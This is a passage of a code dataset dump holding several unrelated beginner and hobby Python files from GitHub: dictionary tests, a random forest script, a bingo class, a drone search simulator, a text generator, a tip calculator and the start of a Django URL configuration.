sample_dict.pop(key)\n\n assert len(sample_dict) == old_len - 1\n assert key not in sample_dict\n assert value_returned == value_test\n\n\n# =============================================================================\n\n\ndef test_dict_popitem():\n \"\"\"\n Test dict.popitem():\n - new_len = old_len - 1\n - key_end not in new dict\n - (key_end, value_end) of old dict == dict.popitem()\n \"\"\"\n num_test = 10\n\n for _ in range(num_test):\n sample_dict = create_random_dict()\n old_len = len(sample_dict)\n\n end_key = list(sample_dict)[-1]\n end_value = sample_dict[end_key]\n\n returned_element = sample_dict.popitem()\n\n assert len(sample_dict) == old_len - 1\n assert end_key == returned_element[0] and end_value == returned_element[1]\n assert end_key not in sample_dict\n\n\n# =============================================================================\n\n\ndef test_dict_setdefault():\n \"\"\"\n Test dict.setdefault(key, value):\n - key in dict: dict[value] == dict.setdefault(key, value)\n - key not in dict: value == dict.setdefault(key, value)\n key in new dict\n new_len == old_len + 1\n \"\"\"\n num_test = 10\n lower, upper = 0, 1000\n\n for _ in range(num_test):\n sample_dict = create_random_dict()\n old_len = len(sample_dict)\n\n key = random.randint(lower, upper)\n if key in sample_dict:\n assert sample_dict[key] == sample_dict.setdefault(key)\n else:\n value_returned = sample_dict.setdefault(key, random.randint(lower, upper))\n\n assert key in sample_dict\n assert len(sample_dict) == old_len + 1\n assert sample_dict[key] == value_returned\n\n\n# =============================================================================\n\n\ndef test_dict_update():\n \"\"\"\n Test dict_1.update(dict_2):\n - {keys: values of keys} of dict_2 in dict_1\n \"\"\"\n num_test = 10\n\n for _ in range(num_test):\n sample_dict_1 = create_random_dict()\n sample_dict_2 = create_random_dict()\n\n sample_dict_1.update(sample_dict_2)\n\n test_val = True\n for k in sample_dict_2:\n if k not in sample_dict_1 or sample_dict_2[k] != sample_dict_1[k]:\n test_val = False\n break\n\n assert test_val\n\n\n# =============================================================================\n\n\ndef test_dict_values():\n \"\"\"\n Test dict.values():\n - dict_values([value_0, value_1, ...]) == dict.values()\n \"\"\"\n num_test = 10\n\n for _ in range(num_test):\n sample_dict = create_random_dict()\n\n list_values = list(sample_dict.values())\n\n test_val = 
True\n        idx = 0\n        for k in sample_dict:\n            if sample_dict[k] != list_values[idx]:\n                test_val = False\n                break\n            idx += 1\n\n        assert len(list_values) == len(sample_dict)\n        assert test_val\n","repo_name":"NguyenTranMLAI/WinterIntern","sub_path":"CODE/Week01/Python/tests/test_dictionary_libs.py","file_name":"test_dictionary_libs.py","file_ext":"py","file_size_in_byte":6760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72650665706","text":"def solution(numbers):\n    answer = ''\n    number = [str(i) for i in numbers]\n\n    number.sort(key=lambda x : x * 3, reverse=True)\n\n    for i in number:\n        answer += i\n\n    if len(answer) >= 2 and answer[0] == '0' and answer[1] == '0':\n        return '0'\n\n    return answer","repo_name":"KyubinHwang/preparing_Algorithm","sub_path":"algorithm_2022_summer_To_Fall/프로그래머스/가장 큰 수.py","file_name":"가장 큰 수.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74744813226","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import classification_report\nimport pickle\n\n\ndef GridSearchRF(X_train,y_train):\n    from sklearn.model_selection import GridSearchCV\n    from sklearn.ensemble import RandomForestClassifier\n    # use a full grid over all parameters\n    param_grid = {\"max_depth\": [4,5,7, None],\n                  \"n_estimators\":[100,200,300,400,500],\n                  \"max_features\": [1, 3, 10],\n                  \"min_samples_split\": [2, 3, 10],\n                  \"min_samples_leaf\": [1, 3, 10],\n                  \"bootstrap\": [True, False]}\n                  #\"criterion\": [\"gini\", \"entropy\"]}\n\n    forest_grid = GridSearchCV(estimator=RandomForestClassifier(random_state=0),\n                               param_grid = param_grid,\n                               # criterion='gini',\n                               scoring=\"accuracy\", #metrics\n                               cv = 3, #cross-validation\n                               n_jobs = -1) #number of cores\n\n    forest_grid.fit(X_train,y_train) #fit\n\n    forest_grid_best = forest_grid.best_estimator_ #best estimator\n    print(\"Best Model Parameter: \",forest_grid.best_params_)\n\n\n\ndf = pd.read_csv(r\"path.csv\", header=0,index_col=0,parse_dates=True)\n\nX_train, X_test, y_train, y_test = train_test_split(df[df.columns[df.columns != 'target']], df.target, test_size=0.2,shuffle=False)\n\nprint('train size:', X_train.shape[0])\nprint('test size:', X_test.shape[0])\nprint('train data:', X_train)\nprint('train target:', y_train)\n\n\n#GridSearchRF(X_train,y_train)\n\n# Train the model\nmodel = RandomForestClassifier(n_estimators=200,random_state=0, n_jobs=-1)\nmodel.fit(X_train, y_train)\n\n# Save the model\npickle.dump(model, open(r'finalized_model.sav', 'wb'))\n\n# Evaluate the trained model\nprint(classification_report(y_test,model.predict(X_test)))\n\ntest_x = X_train.iloc[[10]]\nprint(model.predict(test_x))\nprint(model.predict_proba(test_x))\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n# Feature importances\nfeature = model.feature_importances_\n# Indices sorted by importance (descending)\nindices = np.argsort(feature)[::-1]\n# Feature names\nlabel = df.columns[0:]\n\nplt.title('Feature Importance')\nplt.bar(range(len(feature)),feature[indices], color='lightblue', align='center')\nplt.xticks(range(len(feature)), label[indices], rotation=90)\nplt.xlim([-1, len(feature)])\nplt.tight_layout()\nplt.show()","repo_name":"Speculatorintokyo/FX-Machine-learning","sub_path":"RandomForestsample.py","file_name":"RandomForestsample.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
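A minimal reuse sketch for the record above: reload the pickled classifier and score fresh rows. The file and column names are the ones the record itself uses; everything else is illustrative.

    import pickle
    import pandas as pd

    model = pickle.load(open(r'finalized_model.sav', 'rb'))
    df_new = pd.read_csv(r'path.csv', header=0, index_col=0, parse_dates=True)
    X_new = df_new[df_new.columns[df_new.columns != 'target']]
    print(model.predict(X_new.iloc[:5]))        # hard class labels
    print(model.predict_proba(X_new.iloc[:5]))  # per-class probabilities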
+{"seq_id":"71071776746","text":"class Bingo:\n\n def __init__(self, size: int):\n self.size = size\n self.card = []*size\n self.has_bingo = False\n\n self.mask = []\n # Old: self.mask = [[0]*size]*size\n # To prevent same reference memory problem\n # TODO: find better work around\n for index_y in range(self.size):\n mask_row = []\n for index_x in range(self.size):\n mask_row.append(0)\n self.mask.append(mask_row)\n\n def print_card(self) -> None:\n print(self.card)\n\n def print_mask(self) -> None:\n print(self.mask)\n\n def add_row(self, row: list) -> None:\n new_row = []\n for number in row:\n new_row.append(int(number))\n row = new_row\n\n row_added = False\n for row_index in range(self.size):\n if not self.card[row_index]:\n self.card[row_index] = row\n row_added = True\n break\n\n if not row_added:\n print(f\"Row not added: {row}\")\n\n def has_number(self, number: int) -> None:\n number = int(number)\n\n has_bingo = False\n for row_index in range(self.size):\n for column_index in range(self.size):\n if self.card[row_index][column_index] == number:\n self.mask[row_index][column_index] = 1\n\n if self.row_has_bingo(row_index) or self.column_has_bingo(column_index):\n has_bingo = True\n\n if has_bingo:\n self.has_bingo = True\n print(\"bingo!\")\n self.print_card()\n self.print_mask()\n\n def row_has_bingo(self, row_index: int) -> bool:\n if sum(self.mask[row_index]) == self.size:\n return True\n else:\n return False\n\n def column_has_bingo(self, column_index: int) -> bool:\n column_masks = []\n for row_index in range(self.size):\n column_masks.append(self.mask[row_index][column_index])\n\n if sum(column_masks) == self.size:\n return True\n else:\n return False\n\n def row_sum(self, row_index: int) -> int:\n return sum(self.card[row_index])\n\n def column_sum(self, column_index: int) -> int:\n column_numbers = []\n for row_index in range(self.size):\n column_numbers.append(self.card[row_index][column_index])\n\n return sum(column_numbers)\n\n def winning_sums(self) -> dict:\n winnings_sums = {}\n for index in range(self.size):\n if self.row_has_bingo(index):\n winning_sum = self.row_sum(index)\n winnings_sums.update({f\"row_{index}\": winning_sum})\n if self.column_has_bingo(index):\n winning_sum = self.column_sum(index)\n winnings_sums.update({f\"column_{index}\": winning_sum})\n return winnings_sums\n\n def sum_unmarked(self) -> int:\n counter = 0\n for row_index in range(self.size):\n for column_index in range(self.size):\n if self.mask[row_index][column_index] == 0:\n counter += self.card[row_index][column_index]\n return counter\n\n\nif __name__ == '__main__':\n card = Bingo(9)\n","repo_name":"bverpaalen/AoC2021","sub_path":"days/day_4/bingo_card.py","file_name":"bingo_card.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3316410429","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass Drone:\n class Mode:\n def __init__(self, previous='FreeFly', actual='FreeFly',\n parameters_destination=np.array([]), parameters_detection=0):\n \"\"\"\n % mode:\n % Off --> The drone is off\n % Disarm --> The drone is disarmed\n % Arm --> The drone is armed but not flying\n % FreeFly --> the drone is flying\n % Others, to be built\n \"\"\"\n self.previous = previous\n self.actual = actual\n self.parameters_destination = np.array(parameters_destination)\n self.parameters_detection = parameters_detection\n\n def __init__(self, placed_pattern=0, dowmsampling=6, index=0, 
+{"seq_id":"3316410429","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass Drone:\n    class Mode:\n        def __init__(self, previous='FreeFly', actual='FreeFly',\n                     parameters_destination=np.array([]), parameters_detection=0):\n            \"\"\"\n            % mode:\n            %   Off --> The drone is off\n            %   Disarm --> The drone is disarmed\n            %   Arm --> The drone is armed but not flying\n            %   FreeFly --> the drone is flying\n            %   Others, to be built\n            \"\"\"\n            self.previous = previous\n            self.actual = actual\n            self.parameters_destination = np.array(parameters_destination)\n            self.parameters_detection = parameters_detection\n\n    def __init__(self, placed_pattern=0, downsampling=6, index=0, status_net=True, mode=Mode(),\n                 home=np.array([]), mission_start_position=np.array([]), orientation=0,\n                 speed=0.0, vision=np.array([]), vision_on=True, corners=np.array([]),\n                 radius_vision=0.0, angular_vision=0.0,\n                 std_drone_speed=0.0, std_drone_direction=0.0, std_drone_orientation=0.0,\n                 p_disconnection=0.0, p_misdetection=0.05, p_package_lost=0.05, p_camera_off=0.0):\n        \"\"\"\n        index: drone's index\n        status_net: True --> active on the net, False --> not active on the net\n        mode: same as in the Mode class\n        home: [x,y] (pixel) Home position (for Return to Launch option)\n        position: [x,y] (pixel)\n        orientation: Degrees with respect to North (clockwise). 0: North, 90: East, 180: South, 270: West\n        speed: magnitude of speed (pixels/s) v_x = speed*cosd(orientation-90), v_y = speed*sind(orientation-90)\n        vision:\n        vision_on: Set the camera on at the beginning\n        distance: Array of distances [Bottom, Right, Top, Left]\n        \"\"\"\n        self.index = index\n        self.status_net = status_net\n        self.mode = mode\n        self.corners = corners\n        # Slope of the boundaries\n        self.m1 = (self.corners[1][1] - self.corners[1][0]) / (self.corners[0][1] - self.corners[0][0])  # Bottom\n        self.m2 = (self.corners[1][1] - self.corners[1][2]) / (self.corners[0][1] - self.corners[0][2])  # Right\n        self.m3 = (self.corners[1][3] - self.corners[1][2]) / (self.corners[0][3] - self.corners[0][2])  # Top\n        self.m4 = (self.corners[1][3] - self.corners[1][0]) / (self.corners[0][3] - self.corners[0][0])  # Left\n        self.k_array = [self.m1, self.m2, self.m3, self.m4]\n        if len(home) == 0:\n            self.home_position(placed_pattern, downsampling)\n        else:\n            self.home = np.array(home[index])\n        self.mission_start_position = mission_start_position\n        self.position = self.home\n        self.direction = orientation\n        self.orientation = orientation\n        self.speed = speed\n        self.vision = np.array(vision)\n        self.vision_on = vision_on\n\n        self.radius_vision = radius_vision  # Radius for vision (pixels)\n        self.angular_vision = angular_vision  # Degrees of vision (<180)\n        self.std_drone_speed = std_drone_speed  # Standard deviation for the speed of the drone\n        self.std_drone_direction = std_drone_direction  # Standard deviation for the direction of the drone\n        self.std_drone_orientation = std_drone_orientation  # Standard deviation for the orientation of the drone\n\n        # Probability parameters\n        self.p_disconnection = p_disconnection  # Probability the drone disconnects from the net\n        self.p_misdetection = p_misdetection  # Probability of not identifying a person when a person is in range\n        self.p_package_lost = p_package_lost  # Probability of losing a package of information among the drones\n        self.p_camera_off = p_camera_off  # Probability of turning off the camera and not searching\n        self.distance = np.array([])\n        self.get_distance()\n\n        # General parameters\n        self.downsampling = downsampling\n        if mode.actual == 'Raster_motion':\n            self.is_mission_start = False\n            self.total_raster_step = round(\n                self.radius_vision * np.sin(np.deg2rad(self.angular_vision) / 2) / self.speed)\n            self.current_raster_step = 0\n            self.is_init = True\n            self.is_right = False\n            self.is_left = False\n            self.up_angle = 190\n\n    def home_position(self, placed_pattern, downsampling):\n        \"\"\"\n        Home position for the drone\n        :param placed_pattern:\n            0 --> Random position within the cage\n            1 --> Distributed over one edge\n            2 --> Distributed over all edges\n            3 --> Starting from one corner\n            4 --> Starting from all corners\n        :param downsampling: down-sampling value for home margin\n        :return self.home: home position of drone\n        
\"\"\"\n home_margin = 6.66 / downsampling\n if placed_pattern == 0:\n in_cage = 0.0\n while in_cage == 0.0:\n self.home = np.array([np.random.randint(min(self.corners[0]), max(self.corners[0])),\n np.random.randint(min(self.corners[0]), max(self.corners[1]))])\n in_cage = self.check_boundaries(is_home=True)\n self.orientation = np.random.randint(360)\n elif placed_pattern == 1: # Distributed over one edge (bottom edge)\n aux = np.random.randint(round(self.corners[0][1] - self.corners[0][0] - 2 * home_margin)) + \\\n self.corners[0][0] + home_margin\n self.home = np.array([aux,\n (self.corners[1][1] - self.corners[1][0]) / (\n self.corners[0][1] - self.corners[0][0]) *\n (aux - self.corners[0][0]) + self.corners[1][0] + home_margin])\n self.orientation = 180\n elif placed_pattern == 2: # Distributed over all edges randomly\n edge = np.random.randint(4)\n if edge == 0: # bottom\n aux = np.random.randint(round(self.corners[0][1] - self.corners[0][0] - 2 * home_margin)) + \\\n self.corners[0][0] + home_margin\n self.home = np.array([aux,\n (self.corners[1][1] - self.corners[1][0]) / (\n self.corners[0][1] - self.corners[0][0]) *\n (aux - self.corners[0][0]) + self.corners[1][0] + home_margin])\n self.orientation = 180\n elif edge == 1: # right\n aux = np.random.randint(round(self.corners[0][1] - self.corners[0][2] - 2 * home_margin)) + \\\n self.corners[0][2] + home_margin\n self.home = np.array([aux,\n (self.corners[1][1] - self.corners[1][2]) / (\n self.corners[0][1] - self.corners[0][2]) *\n (aux - self.corners[0][2] + home_margin) + self.corners[1][2]])\n self.orientation = 270\n elif edge == 2: # top\n aux = np.random.randint(round(self.corners[0][2] - self.corners[0][3] - 2 * home_margin)) + \\\n self.corners[0][3] + home_margin\n self.home = np.array([aux,\n (self.corners[1][2] - self.corners[1][3]) / (\n self.corners[0][2] - self.corners[0][3]) *\n (aux - self.corners[0][3]) + self.corners[1][3] - home_margin])\n self.orientation = 0\n elif edge == 3: # left\n aux = np.random.randint(round(self.corners[0][0] - self.corners[0][3] - 2 * home_margin)) + \\\n self.corners[0][3] + home_margin\n self.home = np.array([aux,\n (self.corners[0][1] - self.corners[1][3]) / (\n self.corners[0][0] - self.corners[0][3]) *\n (aux - self.corners[0][3] - home_margin) + self.corners[1][3]])\n self.orientation = 90\n elif placed_pattern == 3: # Starting from one corner (left bottom)\n # self.home = np.array([self.corners[0][0] + home_margin,\n # self.corners[1][0] + 1.5 * home_margin])\n self.home = np.array([self.corners[0][0] + 3 * home_margin,\n self.corners[1][0] + 3 * home_margin])\n self.orientation = 135\n elif placed_pattern == 4: # Starting from all corners randomly\n corner = np.random.randint(4)\n\n if corner == 0: # Bottom left\n self.home = np.array([self.corners[0][0] + home_margin,\n self.corners[1][0] + 1.5 * home_margin])\n self.orientation = 135\n elif corner == 1: # Bottom right\n self.home = np.array([self.corners[0][1] - 1.5 * home_margin,\n self.corners[1][1] + home_margin])\n self.orientation = 225\n elif corner == 2: # Top right\n self.home = np.array([self.corners[0][2] - home_margin,\n self.corners[1][2] - 1.5 * home_margin])\n self.orientation = 315\n elif corner == 3:\n self.home = np.array([self.corners[0][3] + 1.5 * home_margin,\n self.corners[1][3] - home_margin])\n self.orientation = 45\n\n def get_distance(self):\n self.distance = [\n abs(self.k_array[i] * (self.corners[0][i] - self.position[0]) - (self.corners[1][i] - self.position[1]))\n / np.sqrt(self.k_array[i] ** 2 + 
1) for i in range(len(self.k_array))]\n\n    def plot_drone_home(self):\n        \"\"\"\n        plot the drone in the map\n        \"\"\"\n        plt.plot(self.home[0], self.home[1],\n                 'md', markersize=1.5, markeredgewidth=1, fillstyle='none')\n\n    def check_boundaries(self, is_home=False):\n        \"\"\"\n        Checks if a drone is within the range of the cage of KRI\n        :param is_home: whether the checking is for initialization\n        :return: Flag to indicate whether it is in the box\n        \"\"\"\n        if not is_home:\n            pos = [self.position[0], self.position[1]]\n        else:\n            pos = [self.home[0], self.home[1]]\n\n        # Control if it is inside the cage. The equation is control=m(x-a)\n        control1 = self.m1 * (pos[0] - self.corners[0][0]) + self.corners[1][0]  # Y must be above the line\n        control2 = self.m2 * (pos[0] - self.corners[0][2]) + self.corners[1][2]  # Y must be below the line\n        control3 = self.m3 * (pos[0] - self.corners[0][2]) + self.corners[1][2]  # Y must be below the line\n        control4 = self.m4 * (pos[0] - self.corners[0][0]) + self.corners[1][0]  # Y must be above the line\n\n        ck1 = np.sign(pos[1] - control1) + 1  # -1 converts to 0, 1 converts to 2\n        ck2 = -np.sign(pos[1] - control2) + 1\n        ck3 = -np.sign(pos[1] - control3) + 1\n        ck4 = np.sign(pos[1] - control4) + 1\n\n        return ck1 and ck2 and ck3 and ck4\n\n    def plot_status(self):\n        \"\"\"\n        indicate drone's status with different shape and color\n        \"\"\"\n        if self.mode.actual == 'Off':\n            plt.plot(self.position[0], self.position[1],\n                     'ks', markersize=6, fillstyle='none')\n        elif self.mode.actual == 'Disarm':\n            if self.status_net:\n                plt.plot(self.position[0], self.position[1],\n                         'gs', markersize=6,\n                         markeredgewidth=1, fillstyle='none')\n            else:\n                plt.plot(self.position[0], self.position[1],\n                         'rs', markersize=6,\n                         markeredgewidth=1, fillstyle='none')\n        elif self.mode.actual == 'Arm':\n            if self.status_net:\n                plt.plot(self.position[0], self.position[1],\n                         'g+', markersize=6,\n                         markeredgewidth=1, fillstyle='none')\n            else:\n                plt.plot(self.position[0], self.position[1],\n                         'r+', markersize=6,\n                         markeredgewidth=1, fillstyle='none')\n        else:\n            if self.status_net:\n                plt.plot(self.position[0], self.position[1],\n                         'gx', markersize=6,\n                         markeredgewidth=1, fillstyle='none')\n            else:\n                plt.plot(self.position[0], self.position[1],\n                         'rx', markersize=6,\n                         markeredgewidth=1, fillstyle='none')\n\n    def plot_velocity(self):\n        \"\"\"\n        plot drone's velocity\n        \"\"\"\n        plt.quiver(self.position[0], self.position[1],\n                   self.speed * np.cos(np.deg2rad(self.direction - 90)),\n                   self.speed * np.sin(np.deg2rad(self.direction - 90)),\n                   color='b', units='dots', scale=1, width=3, headaxislength=3)\n\n    def plot_vision(self, dense=1):\n        \"\"\"\n        plot the angular vision of a drone\n        \"\"\"\n        for i in range(0, len(self.vision), dense):\n            if sum(self.vision[i]) != 0:\n                tmp = np.nonzero(self.vision[i])\n                line_range = [tmp[0][-1], tmp[0][0]]\n                plt.plot(line_range, [i, i], 'y', linewidth=4, alpha=0.5)\n\n    def detect_person(self, people):\n        \"\"\"\n        :param people: person class with people position\n        :return:\n            detected: number of objects that have been detected\n            pos_detected: the position of objects that have been detected\n        \"\"\"\n        detected = 0\n        pos_detected = []\n        for person in people:\n            y_idx, x_idx = np.nonzero(self.vision)\n            if (round(person.position[0]) in x_idx) and (round(person.position[1]) in y_idx) \\\n                    and (person.detected is False):\n                detected += 1\n                pos_detected.append(tuple(person.position))\n                # person.detected = True\n        return detected, pos_detected\n\n    def goto(self, general_mission_parameters):\n        near = 0\n        if self.mode.actual == 
\"Raster_motion\":\n self.mode.parameters_destination = self.mission_strat_position\n self.direction = np.rad2deg(np.arctan2(self.mode.parameters_destination[1] - self.position[1],\n self.mode.parameters_destination[0] - self.position[0])) + 90\n self.orientation = self.direction\n if np.linalg.norm(self.position - self.mode.parameters_destination) < self.speed:\n self.speed = np.linalg.norm(self.position - self.mode.parameters_destination)\n if np.linalg.norm(\n self.position - self.mode.parameters_destination) < general_mission_parameters.distance_thres:\n near = 1\n return near\n\n def action(self, mission_parameters):\n if self.mode.actual == 'Ignore': # Ignore the detection and continue with the previous status\n # self = self\n pass\n elif self.mode.actual == 'RTL':\n # Update the attributes of the drone based on the destination position.\n # Indicate if the drone is near the destination\n near = self.goto(mission_parameters)\n # drone_out[drone_idx] = drone_in[drone_idx]\n # if the drone is near to the home position, land\n if near:\n self.speed = 0\n self.mode.actual = 'Arm'\n if self.environment.info_flag:\n print(\"Drone {} landed and armed\".format(self.index))\n elif self.mode.actual == 'GoToPerson': # Send the drones to the position of the person detected\n # Update the attributes of the drone based on the destination position.\n # Indicate if the drone is near the destination\n near = self.goto(mission_parameters) # If the drone is near to the destination position, loiter\n if near:\n self.speed = 0\n self.mode.actual = 'Loiter'\n if self.environment.info_flag:\n print(\"Drone {} is loitering\".format(self.index))\n self.mode.parameters_destination = self.position\n elif self.mode.actual is 'Loiter': # Keep the drone flying at its current position\n near = self.goto(mission_parameters)\n self.speed = 0\n # Define the basic random actions: front, back, right, left, rotation +90, -90, 180\n elif self.mode.actual is 'Random_action':\n # if mission_parameters.isDebug:\n # drone_action_id = np.random.randint(mission_parameters.num_simple_actions)\n # else:\n # drone_action_id = mission_parameters.action_id[self.index]\n if np.min(self.distance) < 6.66 / self.downsampling:\n idx = np.argmin(self.distance)\n drone_action_id = idx + (-1) ** idx\n else:\n if mission_parameters.action_id is None:\n drone_action_id = np.random.randint(mission_parameters.num_simple_actions)\n else:\n drone_action_id = mission_parameters.action_id[self.index]\n self.simple_action(drone_action_id, mission_parameters)\n elif self.mode.actual is 'FreeFly':\n drone_action_id = mission_parameters.action_id[self.index]\n self.simple_action(drone_action_id, mission_parameters)\n elif self.mode.actual is 'Raster_motion':\n if not self.is_mission_start:\n near = self.goto(mission_parameters)\n if near:\n self.speed = mission_parameters.speed\n self.direction = 105\n self.orientation = self.direction\n print(\"Drone #{} arriving mission starting point. 
Raster motion start.\".format(self.index))\n                    self.is_mission_start = True\n            else:\n                threshold = 6.66 / self.downsampling * 0.5 * self.radius_vision * np.sin(\n                    np.deg2rad(self.angular_vision) / 2) / mission_parameters.speed\n                if self.is_init:\n                    self.current_raster_step = self.total_raster_step\n                    self.direction = 105\n                    self.orientation = self.direction\n                    self.speed = mission_parameters.speed\n                    if self.distance[1] > threshold and self.distance[3] > threshold:\n                        self.is_init = False\n\n                else:\n                    if self.distance[1] < threshold or self.distance[3] < threshold:\n                        if self.current_raster_step != 0:\n                            self.is_right = False\n                            self.is_left = False\n                            self.current_raster_step -= 1\n                            self.direction = 195\n                            self.orientation = self.direction\n                            self.speed = mission_parameters.speed\n                        else:\n                            if self.distance[1] < threshold:\n                                self.is_right = True\n                                self.direction = 285\n                                self.orientation = self.direction\n                                self.speed = mission_parameters.speed\n                            elif self.distance[3] < threshold:\n                                self.is_left = True\n                                self.direction = 105\n                                self.orientation = self.direction\n                                self.speed = mission_parameters.speed\n                            self.current_raster_step = self.total_raster_step\n\n                    else:\n                        if self.is_right:\n                            self.direction = 285\n                            self.orientation = self.direction\n                            self.speed = mission_parameters.speed\n                        elif self.is_left:\n                            self.direction = 105\n                            self.orientation = self.direction\n                            self.speed = mission_parameters.speed\n                            self.current_raster_step = self.total_raster_step\n                        else:\n                            pass\n\n    def simple_action(self, action_id, mission_parameters):\n        # action_id = 0 --> Move 1 meter/s to the north\n        # action_id = 1 --> Move 1 meter/s to the south\n        # action_id = 2 --> Move 1 meter/s to the east\n        # action_id = 3 --> Move 1 meter/s to the west\n        # action_id = 4 --> Rotate 30 degrees clockwise\n        # action_id = 5 --> Rotate 30 degrees counter clockwise\n        # action_id = 6 --> Rotate 180 degrees clockwise\n        if action_id == 0:\n            self.direction = 0\n            self.speed = mission_parameters.speed\n        elif action_id == 1:\n            self.direction = 180\n            self.speed = mission_parameters.speed\n        elif action_id == 2:\n            self.direction = 90\n            self.speed = mission_parameters.speed\n        elif action_id == 3:\n            self.direction = 270\n            self.speed = mission_parameters.speed\n        elif action_id == 4:\n            self.orientation = self.orientation + 30\n            self.speed = 0\n        elif action_id == 5:\n            self.orientation = self.orientation - 30\n            self.speed = 0\n        elif action_id == 6:\n            self.orientation = self.orientation + 180\n            self.speed = 0\n","repo_name":"wuyushuwys/Kostas_Simulator","sub_path":"Drone.py","file_name":"Drone.py","file_ext":"py","file_size_in_byte":21803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
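To make the raster geometry in the record above concrete: `total_raster_step` rounds `radius_vision * sin(angular_vision / 2) / speed`, the number of simulation steps needed to cross one swath of the camera footprint. A worked example with illustrative numbers (nothing here comes from the record except the formula itself):

    import numpy as np

    radius_vision, angular_vision, speed = 30.0, 90.0, 3.0          # px, degrees, px/s
    swath = radius_vision * np.sin(np.deg2rad(angular_vision) / 2)  # ~21.2 px
    print(round(swath / speed))                                     # total_raster_step = 7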
+{"seq_id":"13472857812","text":"import pickle\nimport random\nimport argparse\nfrom sys import stdin\n\n\ndef rand_choose(dic, word, result, args):\n    a = []\n    for neighboring in dic[word]:\n        a.append(neighboring)\n    current = random.choice(a)\n    if args.file == 'stdout':\n        print(current + ' ', end='')\n    else:\n        result.write(current + ' ')\n    return current\n\n\nparser = argparse.ArgumentParser(description='A script which collects words from file')\nparser.add_argument('--model', type=str, help='Load dictionary from a file')\nparser.add_argument('--seed', dest='first', type=str, help='First word')\nparser.add_argument('--length', type=int, help='The length of the generated text')\nparser.add_argument('--output', dest='file', type=str, default='stdout', help='Finished text download file')\nargs = parser.parse_args()\nf = args.model  # file to load the dictionary from\nwith open(f, 'rb') as f:  # was a hardcoded 'd.pickle', which ignored --model\n    my_dic = pickle.load(f)\nfirst = args.first\nlength = args.length\nway = args.file\nresult = open(way, 'w')\ncurrent = first\nfor i in range(length):\n    if current in my_dic:\n        current = rand_choose(my_dic, current, result, args)\n    else:\n        a = []\n        for key in my_dic:\n            a.append(key)\n        current = random.choice(a)\n        if args.file == 'stdout':\n            print(current + ' ', end='')\n        else:\n            result.write(current + ' ')","repo_name":"MertMuseibov/yandex_present","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3642462726","text":"#**************************************************************\n# Date: 040221 *\n# Tax and Tip *\n# Programmer: BoredManager *\n# The program that you create for this exercise will begin by *\n# reading the cost of a meal ordered at a restaurant from the *\n# user. Then your program will compute the tax and tip for *\n# the meal. Use your local tax rate when computing the amount *\n# of tax owing. Compute the tip as 18 percent of the meal *\n# amount (without the tax). The output from your program *\n# should include the tax amount, the tip amount, and the *\n# grand total for the meal including both the tax and the *\n# tip. Format the output so that all of the values are *\n# displayed using two decimal places. *\n#**************************************************************\ncomputed_value = 0\nicheck = -1\nwhile icheck == -1:\n    iMealCost = input(\"Please enter the total meal amount in Php ==> \")\n    try:\n        ciMealCost = float(iMealCost)\n        icheck = 0\n    except:\n        print(\"Please use number data only.\")\n#--------------------------------------------------------------\nPhpTax = .10\nTipPercent = .18\ncomputed_tax = round((ciMealCost * PhpTax),2)\ncomputed_tip = round((ciMealCost * TipPercent),2)\ntotal_computed_value = ciMealCost + computed_tax + computed_tip\ntotal_computed_value = round(total_computed_value,2)\nciMealCost = round(ciMealCost,2)\n#--------------------------------------------------------------\nfinal_cost = str(ciMealCost)\nfinal_tip = str(computed_tip)\nfinal_tax = str(computed_tax)\nfinal_value = str(total_computed_value)\n#--------------------------------------------------------------\nprint(\"The meal amount is Php \"+final_cost)\nprint(\"The tax amount is Php \"+final_tax)\nprint(\"The tip amount is Php \"+final_tip)\nprint(\"The total amount due is Php \"+final_value)\nprint(\"Thank you for using this app.\")\n\n#**************************************************************\n# what have I learned from this challenge?\n# - it gets easier because the next challenge is usually a\n#   variation of the previous one.\n# - i still need to brush up with the variable definition and\n#   available operations in Python (A1).","repo_name":"boredmanager888/mycommonrepo","sub_path":"pythonwb_intro/E006.py","file_name":"E006.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71812402988","text":"#!/usr/bin/python3\n\ndef search_replace(my_list, search, replace):\n    # Create a new list to store the modified elements\n    new_list = []\n    for item in my_list:\n        # Check if the item matches the search element\n        if item == search:\n            # If it matches, append the replace element to the new list\n            new_list.append(replace)\n        else:\n            # If it doesn't match, append 
the original item to the new list\n new_list.append(item)\n return new_list\n","repo_name":"ImadPro69/alx-higher_level_programming","sub_path":"0x04-python-more_data_structures/1-search_replace.py","file_name":"1-search_replace.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73062533547","text":"from django.conf.urls import patterns, url\nfrom django.views.generic import TemplateView\n\nurlpatterns = patterns('',\n url(r'^$', 'ams.views.default', name='default'),\n url(r'^event/(?P\\d{1,3})/$', 'ams.views.detail', name='detail'),\n url(r'^engineer/(?P\\d{1,3})/$', 'ams.views.detail_engineer', name='engineer'),\n url(r'^step/(?P\\d{1,3})/$', 'ams.views.detail_step', name='step'),\n\n url(r'^accounts/login/$', 'ams.views.user_login', name='login'),\n url(r'^accounts/login/welcome/$', TemplateView.as_view(template_name='ams/welcome.html'), name='welcome'),\n\n url(r'^accounts/logout/$', 'ams.views.user_logout', name='logout'),\n url(r'^accounts/logout/goodbye/$', TemplateView.as_view(template_name='ams/goodbye.html'), 